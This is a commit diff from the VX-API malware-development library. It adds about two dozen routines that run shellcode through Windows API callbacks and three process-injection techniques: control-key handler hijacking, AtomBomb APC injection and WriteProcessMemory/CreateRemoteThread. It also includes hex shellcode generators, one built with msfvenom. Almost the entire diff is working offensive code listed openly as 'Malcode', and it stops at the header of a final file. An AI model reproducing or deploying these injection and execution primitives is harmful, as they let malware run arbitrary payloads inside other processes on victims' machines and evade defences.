2.0.559

2022-12-24 14:53:28 -06:00 · 2022-12-24 14:53:28 -06:00 · c91d3da65e
parent 0f0f9aab4c
commit c91d3da65e
38 changed files with 1046 additions and 647 deletions
--- a/README.md
+++ b/README.md
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
  
 # VX-API

-Version: 2.0.513
+Version: 2.0.559

 Developer: smelly__vx
  
@ -156,12 +156,41 @@ You're free to use this in any manner you please. You do not need to use this en
 | MpfGetLsaPidFromServiceManager | modexp | Malcode |
 | MpfGetLsaPidFromRegistry | modexp | Malcode |
 | MpfGetLsaPidFromNamedPipe | modexp | Malcode |
-| ShellcodeExecutionViaFunctionCallbackMain | alfarom256, aahmad097| Malcode |
-| ProcessInjectionMain | SafeBreach Labs | Malcode |
+| MpfSceViaEnumChildWindows | alfarom256, aahmad097 | Malcode |
+| MpfSceViaCDefFolderMenu_Create2 | alfarom256, aahmad097 | Malcode |
+| MpfSceViaCertEnumSystemStore | alfarom256, aahmad097 | Malcode |
+| MpfSceViaCertEnumSystemStoreLocation | alfarom256, aahmad097 | Malcode |
+| MpfSceViaEnumDateFormatsW | alfarom256, aahmad097 | Malcode |
+| MpfSceViaEnumDesktopWindows | alfarom256, aahmad097 | Malcode |
+| MpfSceViaEnumDesktopsW | alfarom256, aahmad097 | Malcode |
+| MpfSceViaEnumDirTreeW | alfarom256, aahmad097 | Malcode |
+| MpfSceViaEnumDisplayMonitors | alfarom256, aahmad097 | Malcode |
+| MpfSceViaEnumFontFamiliesExW | alfarom256, aahmad097 | Malcode |
+| MpfSceViaEnumFontsW | alfarom256, aahmad097 | Malcode |
+| MpfSceViaEnumLanguageGroupLocalesW | alfarom256, aahmad097 | Malcode |
+| MpfSceViaEnumObjects | alfarom256, aahmad097 | Malcode |
+| MpfSceViaEnumResourceTypesExW | alfarom256, aahmad097 | Malcode |
+| MpfSceViaEnumSystemCodePagesW | alfarom256, aahmad097 | Malcode |
+| MpfSceViaEnumSystemGeoID | alfarom256, aahmad097 | Malcode |
+| MpfSceViaEnumSystemLanguageGroupsW | alfarom256, aahmad097 | Malcode |
+| MpfSceViaEnumSystemLocalesEx | alfarom256, aahmad097 | Malcode |
+| MpfSceViaEnumThreadWindows | alfarom256, aahmad097 | Malcode |
+| MpfSceViaEnumTimeFormatsEx | alfarom256, aahmad097 | Malcode |
+| MpfSceViaEnumUILanguagesW | alfarom256, aahmad097 | Malcode |
+| MpfSceViaEnumWindowStationsW | alfarom256, aahmad097 | Malcode |
+| MpfSceViaEnumWindows | alfarom256, aahmad097 | Malcode |
+| MpfSceViaEnumerateLoadedModules64 | alfarom256, aahmad097 | Malcode |
+| MpfSceViaK32EnumPageFilesW | alfarom256, aahmad097 | Malcode |
+| MpfSceViaEnumPwrSchemes | alfarom256, aahmad097 | Malcode |
+| MpfSceViaMessageBoxIndirectW | alfarom256, aahmad097 | Malcode |
 | MpfComMonitorChromeSessionOnce | smelly__vx | Malcode |
 | MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc | aaaddress1 | Malcode |
 | MpfLolExecuteRemoteBinaryByAppInstaller | Wade Hickey | Malcode |
 | MpfExtractMaliciousPayloadFromZipFileNoPassword | Codu | Malcode |
+| MpfPiControlInjection | SafeBreach Labs | Malcode |
+| MpfPiQueueUserAPCViaAtomBomb | SafeBreach Labs | Malcode |
+| MpfPiWriteProcessMemoryCreateRemoteThread | SafeBreach Labs | Malcode |
+| MpfProcessInjectionViaProcessReflection | Deep Instinct | Malcode |
 | UrlDownloadToFileSynchronous | Hans Passant | Networking |
 | ConvertIPv4IpAddressStructureToString | smelly__vx | Networking |
 | ConvertIPv4StringToUnsignedLong | smelly__vx | Networking |
--- a/VX-API/Main.cpp
+++ b/VX-API/Main.cpp
@ -2,28 +2,16 @@

 INT main(VOID)
 {
-	DWORD dwError = ERROR_SUCCESS;
-	PBYTE Buffer = NULL;
+	PCHAR Buffer = NULL;
+	DWORD dwSize = 0;

-	/*SHELLCODE_EXECUTION_INFORMATION Sei = { 0 };
-	Sei.Payload = (LPBYTE)GenericShellcodeOpenCalcExitThread();
-	Sei.dwLengthOfPayloadInBytes = 277;
-	Sei.MethodEnum = E_ENUMDESKTOPSW;
-	DWORD dwX = 0;*/
-	
-	PROCESS_INJECTION_INFORMATION Pii = { 0 };
+	Buffer = GenericShellcodeHelloWorldMessageBoxA(&dwSize);

-	Pii.Payload = (LPBYTE)GenericShellcodeHelloWorldMessageBoxAEbFbLoop();
-	Pii.dwLengthOfPayloadInBytes = 70;
-	Pii.ProcessId = 33176;
-	Pii.ThreadId = 18600;
-	Pii.MethodEnum = E_QUEUE_USER_APC;
+	MpfSceViaMessageBoxIndirectW((PBYTE)Buffer, dwSize);

-	//ShellcodeExecutionViaFunctionCallbackMain(&Sei);
-	//ProcessInjectionMain(&Pii);
+	if (Buffer)
+		HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, Buffer);

-	MpfExtractMaliciousPayloadFromZipFileW((PWCHAR)L"C:\\Users\\dwThr\\Desktop\\Test.zip", (PWCHAR)L"C:\\Users\\dwThr\\Desktop\\");
-
-	return dwError;
+	return ERROR_SUCCESS;
 }

--- a/VX-API/MiscGenericShellcodePayloads.cpp
+++ b/VX-API/MiscGenericShellcodePayloads.cpp
@ -1,6 +1,6 @@
 #include "Win32Helper.h"

-PCHAR GenericShellcodeHelloWorldMessageBoxA(VOID)
+PCHAR GenericShellcodeHelloWorldMessageBoxA(_Out_ PDWORD SizeOfShellcodeInBytes)
 {
 	UCHAR RawPayloadBuffer[] =
 		"\x48\xB8\x44\x44\x44\x44\x44\x44\x44\x44\x50\x48\xB8"
@ -28,10 +28,12 @@ PCHAR GenericShellcodeHelloWorldMessageBoxA(VOID)
 	CopyMemory(MemoryFindMemory(Payload, RawBufferSize, (PCHAR)&OffsetCaption, 8), Caption, 8);
 	CopyMemory(MemoryFindMemory(Payload, RawBufferSize, (PCHAR)&OffsetFunction, 8), &FunctionPointer, 8);

+	*SizeOfShellcodeInBytes = RawBufferSize;
+
 	return Payload;
 }

-PCHAR GenericShellcodeHelloWorldMessageBoxAEbFbLoop(VOID)
+PCHAR GenericShellcodeHelloWorldMessageBoxAEbFbLoop(_Out_ PDWORD SizeOfShellcodeInBytes)
 {
 	UCHAR RawPayloadBuffer[] =
 		"\x48\xB8\x44\x44\x44\x44\x44\x44\x44\x44\x50\x48\xB8"
@ -59,10 +61,12 @@ PCHAR GenericShellcodeHelloWorldMessageBoxAEbFbLoop(VOID)
 	CopyMemory(MemoryFindMemory(Payload, RawBufferSize, (PCHAR)&OffsetCaption, 8), Caption, 8);
 	CopyMemory(MemoryFindMemory(Payload, RawBufferSize, (PCHAR)&OffsetFunction, 8), &FunctionPointer, 8);

+	*SizeOfShellcodeInBytes = RawBufferSize;
+
 	return Payload;
 }

-PCHAR GenericShellcodeOpenCalcExitThread(VOID)
+PCHAR GenericShellcodeOpenCalcExitThread(_Out_ PDWORD SizeOfShellcodeInBytes)
 {
 	//msfvenom -p windows/x64/exec EXITFUNC=thread CMD=calc.exe -f c -a x64
 	//Length = 277
@ -98,5 +102,7 @@ PCHAR GenericShellcodeOpenCalcExitThread(VOID)

 	CopyMemory(Payload, RawPayloadBuffer, RawBufferSize);

+	*SizeOfShellcodeInBytes = RawBufferSize;
+
 	return Payload;
 }
--- a/VX-API/MpfPiControlInjection.cpp
+++ b/VX-API/MpfPiControlInjection.cpp
@ -0,0 +1,121 @@
+#include "Win32Helper.h"
+
+BOOL MpfPiControlInjection(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _In_ DWORD TargetProcessId)
+{
+	typedef NTSTATUS(NTAPI* RTLENCODEREMOTEPOINTER)(HANDLE, PVOID, PVOID*);
+	RTLENCODEREMOTEPOINTER RtlEncodeRemotePointer = NULL;
+	HMODULE hNtdll = NULL;
+	HMODULE hKernelbase = NULL;
+	MODULEINFO KernelbaseInformation = { 0 };
+	PCHAR KernelBaseDefaultHandler = NULL;
+	PCHAR KernelBaseSingleHandler = NULL;
+	DWORD64 Encoded = 0;
+	DWORD ConsoleAttachList[2] = { 0 };
+	DWORD ParentId = 0;
+	HWND hWindow = NULL;
+	PVOID EncodedAddress = NULL;
+	HANDLE hHandle = NULL;
+	LPVOID BaseAddress = NULL;
+	INPUT Input = { 0 };
+	BOOL bFlag = FALSE;				
+
+	hNtdll = GetModuleHandleEx2W(L"ntdll.dll");
+	hKernelbase = GetModuleHandleEx2W(L"kernelbase.dll");
+
+	if (!hNtdll || !hKernelbase)
+		goto EXIT_ROUTINE;
+
+	RtlEncodeRemotePointer = (RTLENCODEREMOTEPOINTER)GetProcAddressA((DWORD64)hNtdll, "RtlEncodeRemotePointer");
+	if (!RtlEncodeRemotePointer)
+		goto EXIT_ROUTINE;
+
+	if (!K32GetModuleInformation(InlineGetCurrentProcess, hKernelbase, &KernelbaseInformation, sizeof(KernelbaseInformation)))
+		goto EXIT_ROUTINE;
+
+	KernelBaseDefaultHandler = (PCHAR)MemoryFindMemory(hKernelbase, KernelbaseInformation.SizeOfImage, (PVOID)"\x48\x83\xec\x28\xb9\x3a\x01\x00\xc0", 9);
+	if (KernelBaseDefaultHandler == NULL)
+		goto EXIT_ROUTINE;
+
+	Encoded = (DWORD64)EncodePointer(KernelBaseDefaultHandler);
+	if (Encoded == 0)
+		goto EXIT_ROUTINE;
+
+	KernelBaseSingleHandler = (PCHAR)MemoryFindMemory(hKernelbase, KernelbaseInformation.SizeOfImage, &Encoded, 8);
+	if (KernelBaseSingleHandler == NULL)
+		goto EXIT_ROUTINE;
+
+	if (GetConsoleProcessList(ConsoleAttachList, 2) < 2)
+		goto EXIT_ROUTINE;
+
+	if (ConsoleAttachList[0] != GetCurrentProcessIdFromTeb())
+		ParentId = ConsoleAttachList[0];
+	else
+		ParentId = ConsoleAttachList[1];
+
+	FreeConsole();
+	AttachConsole(TargetProcessId);
+
+	hWindow = GetConsoleWindow();
+
+	FreeConsole();
+	AttachConsole(ParentId);
+
+	hHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, TargetProcessId);
+
+	BaseAddress = VirtualAllocEx(hHandle, NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BaseAddress == NULL)
+		goto EXIT_ROUTINE;
+
+	if (!WriteProcessMemory(hHandle, BaseAddress, Payload, PayloadSizeInBytes, NULL))
+		goto EXIT_ROUTINE;
+
+	CloseHandle(hHandle);
+
+	hHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, TargetProcessId);
+	if (hHandle == NULL)
+		goto EXIT_ROUTINE;
+
+	RtlEncodeRemotePointer(hHandle, BaseAddress, &EncodedAddress);
+
+	if (!WriteProcessMemory(hHandle, KernelBaseSingleHandler, &EncodedAddress, 8, NULL))
+		goto EXIT_ROUTINE;
+
+	Input.type = INPUT_KEYBOARD;
+	Input.ki.wScan = 0;
+	Input.ki.time = 0;
+	Input.ki.dwExtraInfo = 0;
+	Input.ki.wVk = VK_CONTROL;
+	Input.ki.dwFlags = 0; // 0 for key press
+
+	SendInput(1, &Input, sizeof(INPUT));
+	Sleep(100);
+
+	PostMessageA(hWindow, WM_KEYDOWN, 'C', 0);
+
+	Sleep(100);
+
+	Input.type = INPUT_KEYBOARD;
+	Input.ki.wScan = 0;
+	Input.ki.time = 0;
+	Input.ki.dwExtraInfo = 0;
+	Input.ki.wVk = VK_CONTROL;
+	Input.ki.dwFlags = KEYEVENTF_KEYUP;
+	SendInput(1, &Input, sizeof(INPUT));
+
+	RtlEncodeRemotePointer(hHandle, KernelBaseDefaultHandler, &EncodedAddress);
+
+	if (!WriteProcessMemory(hHandle, KernelBaseSingleHandler, &EncodedAddress, 8, NULL))
+		goto EXIT_ROUTINE;
+
+	bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+	if (Payload)
+		HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, Payload);
+
+	if (hHandle)
+		CloseHandle(hHandle);
+
+	return bFlag;
+}
--- a/VX-API/MpfPiQueueUserAPCViaAtomBomb.cpp
+++ b/VX-API/MpfPiQueueUserAPCViaAtomBomb.cpp
@ -0,0 +1,69 @@
+#include "Win32Helper.h"
+
+BOOL MpfPiQueueUserAPCViaAtomBomb(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _In_ DWORD TargetThreadId)
+{
+	HANDLE hHandle = NULL;
+	LPVOID BaseAddress = NULL;
+	HANDLE hThread = NULL;
+	BOOL bFlag = FALSE;
+	NTQUEUEAPCTHREAD NtQueueApcThread = NULL;
+	HMODULE hModule = NULL;
+	ATOM Alpha = ERROR_SUCCESS, Bravo = ERROR_SUCCESS;
+	PCHAR pPayload = (PCHAR)Payload;
+
+	hModule = GetModuleHandleEx2W(L"ntdll.dll");
+	if (hModule == NULL)
+		goto EXIT_ROUTINE;
+
+	NtQueueApcThread = (NTQUEUEAPCTHREAD)GetProcAddressA((DWORD64)hModule, "NtQueueApcThread");
+	if (!NtQueueApcThread)
+		goto EXIT_ROUTINE;
+
+	hThread = OpenThread(THREAD_SET_CONTEXT | THREAD_QUERY_INFORMATION, FALSE, TargetThreadId);
+	if (hThread == NULL)
+		goto EXIT_ROUTINE;
+
+	hHandle = OpenProcess(0x001fffff, FALSE, GetProcessIdOfThread(hThread));
+	if (hHandle == NULL)
+		goto EXIT_ROUTINE;
+
+	BaseAddress = VirtualAllocEx(hHandle, NULL, PayloadSizeInBytes, 0x00003000, 0x00000040);
+	if (BaseAddress == NULL)
+		goto EXIT_ROUTINE;
+
+	Bravo = GlobalAddAtomA("b");
+	if (Bravo == 0)
+		goto EXIT_ROUTINE;
+
+	if (pPayload[0] == '\0')
+		goto EXIT_ROUTINE;
+
+	for (DWORD64 Position = PayloadSizeInBytes - 1; Position > 0; Position--)
+	{
+		if ((pPayload[Position] == '\0') && (pPayload[Position - 1] == '\0'))
+			NtQueueApcThread(hThread, GlobalGetAtomNameA, (PVOID)Bravo, (PVOID)(((DWORD64)BaseAddress) + Position - 1), (PVOID)2);
+	}
+
+	for (PCHAR Position = pPayload; Position < (pPayload + PayloadSizeInBytes); Position += strlen(Position) + 1)
+	{
+		if (*Position == '\0')
+			continue;
+
+		Alpha = GlobalAddAtomA(Position);
+		if (Alpha == 0)
+			goto EXIT_ROUTINE;
+
+		NtQueueApcThread(hThread, GlobalGetAtomNameA, (PVOID)Alpha, (PVOID)(((DWORD64)BaseAddress) + (Position - pPayload)), (PVOID)(StringLengthA(Position) + 1));
+	}
+
+	QueueUserAPC((PAPCFUNC)BaseAddress, hThread, 0);
+
+	bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+	if (hThread)
+		CloseHandle(hThread);
+
+	return bFlag;
+}
--- a/VX-API/MpfPiWriteProcessMemoryCreateRemoteThread.cpp
+++ b/VX-API/MpfPiWriteProcessMemoryCreateRemoteThread.cpp
@ -0,0 +1,40 @@
+#include "Win32Helper.h"
+
+BOOL MpfPiWriteProcessMemoryCreateRemoteThread(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _In_ DWORD TargetProcessId)
+{
+	HANDLE hHandle = NULL, hThread = NULL;
+	LPVOID BaseAddress = NULL;
+	BOOL bFlag = FALSE;
+
+	hHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, TargetProcessId);
+	if (hHandle == NULL)
+		goto EXIT_ROUTINE;
+
+	BaseAddress = VirtualAllocEx(hHandle, NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BaseAddress == NULL)
+		goto EXIT_ROUTINE;
+
+	if (!SetProcessPrivilegeToken(0))
+		goto EXIT_ROUTINE;
+
+	if (!WriteProcessMemory(hHandle, BaseAddress, Payload, PayloadSizeInBytes, NULL))
+		goto EXIT_ROUTINE;
+
+	hThread = CreateRemoteThread(hHandle, NULL, 0, (LPTHREAD_START_ROUTINE)BaseAddress, NULL, 0, NULL);
+	if (hThread == NULL)
+		goto EXIT_ROUTINE;
+
+	WaitForSingleObject(hThread, INFINITE);
+
+	bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+	if (hThread)
+		CloseHandle(hThread);
+
+	if (hHandle)
+		CloseHandle(hHandle);
+
+	return bFlag;
+}
--- a/VX-API/MpfSceViaCDefFolderMenu_Create2.cpp
+++ b/VX-API/MpfSceViaCDefFolderMenu_Create2.cpp
@ -0,0 +1,22 @@
+#include "Win32Helper.h"
+
+VOID InvokeCDefFolderMenu_Create2ThreadCallbackRoutine(LPVOID lpParameter)
+{
+	IContextMenu* ContextMenuRequired = NULL;
+	CDefFolderMenu_Create2(NULL, NULL, 0, NULL, NULL, (LPFNDFMCALLBACK)lpParameter, 0, NULL, &ContextMenuRequired);
+}
+
+BOOL MpfSceViaCDefFolderMenu_Create2(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeCDefFolderMenu_Create2ThreadCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaCertEnumSystemStore.cpp
+++ b/VX-API/MpfSceViaCertEnumSystemStore.cpp
@ -0,0 +1,23 @@
+#include "Win32Helper.h"
+
+//CertEnumSystemStore
+
+VOID InvokeCertEnumSystemStoreThreadCallbackRoutine(LPVOID lpParameter)
+{
+	CertEnumSystemStore(CERT_SYSTEM_STORE_CURRENT_USER, NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE)lpParameter);
+}
+
+BOOL MpfSceViaCertEnumSystemStore(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeCertEnumSystemStoreThreadCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaCertEnumSystemStoreLocation.cpp
+++ b/VX-API/MpfSceViaCertEnumSystemStoreLocation.cpp
@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+VOID InvokeCertEnumSystemStoreLocationThreadCallbackRoutine(LPVOID lpParameter)
+{
+	CertEnumSystemStoreLocation(NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE_LOCATION)lpParameter);
+}
+
+BOOL MpfSceViaCertEnumSystemStoreLocation(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeCertEnumSystemStoreLocationThreadCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumChildWindows.cpp
+++ b/VX-API/MpfSceViaEnumChildWindows.cpp
@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumChildWindowsThreadCallbackRoutine(LPVOID lpParameter)
+{
+	EnumChildWindows(NULL, (WNDENUMPROC)lpParameter, NULL);
+}
+
+BOOL MpfSceViaEnumChildWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumChildWindowsThreadCallbackRoutine, BinAddress, INFINITE);
+	
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumDateFormatsW.cpp
+++ b/VX-API/MpfSceViaEnumDateFormatsW.cpp
@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumDateFormatsWThreadCallbackRoutine(LPVOID lpParameter)
+{
+	EnumDateFormatsW((DATEFMT_ENUMPROCW)lpParameter, LOCALE_SYSTEM_DEFAULT, 0);
+}
+
+BOOL MpfSceViaEnumDateFormatsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumDateFormatsWThreadCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumDesktopWindows.cpp
+++ b/VX-API/MpfSceViaEnumDesktopWindows.cpp
@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumDesktopWindowsThreadCallbackRoutine(LPVOID lpParameter)
+{
+	EnumDesktopWindows(GetThreadDesktop(GetCurrentThreadId()), (WNDENUMPROC)lpParameter, NULL);
+}
+
+BOOL MpfSceViaEnumDesktopWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumDesktopWindowsThreadCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumDesktopsW.cpp
+++ b/VX-API/MpfSceViaEnumDesktopsW.cpp
@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumDesktopsWThreadCallbackRoutine(LPVOID lpParameter)
+{
+	EnumDesktopsW(GetProcessWindowStation(), (DESKTOPENUMPROCW)lpParameter, NULL);
+}
+
+BOOL MpfSceViaEnumDesktopsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumDesktopsWThreadCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumDirTreeW.cpp
+++ b/VX-API/MpfSceViaEnumDirTreeW.cpp
@ -0,0 +1,28 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumDirTreeWThreadCallbackRoutine(LPVOID lpParameter)
+{
+	WCHAR DisposeableBuffer[512] = { 0 };
+
+	if (!SymInitialize(InlineGetCurrentProcess, NULL, TRUE))
+		return;
+
+	EnumDirTreeW(InlineGetCurrentProcess, L"C:\\Windows", L"*.log", DisposeableBuffer, (PENUMDIRTREE_CALLBACKW)lpParameter, NULL);
+
+	SymCleanup(InlineGetCurrentProcess);
+}
+
+BOOL MpfSceViaEnumDirTreeW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumDirTreeWThreadCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumDisplayMonitors.cpp
+++ b/VX-API/MpfSceViaEnumDisplayMonitors.cpp
@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumDisplayMonitorsThreadCallbackRoutine(LPVOID lpParameter)
+{
+	EnumDisplayMonitors(NULL, NULL, (MONITORENUMPROC)lpParameter, NULL);
+}
+
+BOOL MpfSceViaEnumDisplayMonitors(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumDisplayMonitorsThreadCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumFontFamiliesExW.cpp
+++ b/VX-API/MpfSceViaEnumFontFamiliesExW.cpp
@ -0,0 +1,24 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumFontFamiliesExWThreadCallbackRoutine(LPVOID lpParameter)
+{
+	LOGFONTW Font = { 0 };
+	Font.lfCharSet = DEFAULT_CHARSET;
+
+	EnumFontFamiliesExW(GetDC(NULL), &Font, (FONTENUMPROCW)lpParameter, NULL, NULL);
+}
+
+BOOL MpfSceViaEnumFontFamiliesExW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumFontFamiliesExWThreadCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumFontsW.cpp
+++ b/VX-API/MpfSceViaEnumFontsW.cpp
@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumFontsWThreadCallbackRoutine(LPVOID lpParameter)
+{
+	EnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)lpParameter, NULL);
+}
+
+BOOL MpfSceViaEnumFontsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumFontsWThreadCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumLanguageGroupLocalesW.cpp
+++ b/VX-API/MpfSceViaEnumLanguageGroupLocalesW.cpp
@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumLanguageGroupLocalesWThreadCallbackRoutine(LPVOID lpParameter)
+{
+	EnumLanguageGroupLocalesW((LANGGROUPLOCALE_ENUMPROCW)lpParameter, LGRPID_ARABIC, 0, 0);
+}
+
+BOOL MpfSceViaEnumLanguageGroupLocalesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumLanguageGroupLocalesWThreadCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumObjects.cpp
+++ b/VX-API/MpfSceViaEnumObjects.cpp
@ -0,0 +1,24 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumObjectsThreadCallbackRoutine(LPVOID lpParameter)
+{
+	LOGFONTW Font = { 0 };
+	Font.lfCharSet = DEFAULT_CHARSET;
+
+	EnumObjects(GetDC(NULL), OBJ_BRUSH, (GOBJENUMPROC)lpParameter, NULL);
+}
+
+BOOL MpfSceViaEnumObjects(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumObjectsThreadCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumPwrSchemes.cpp
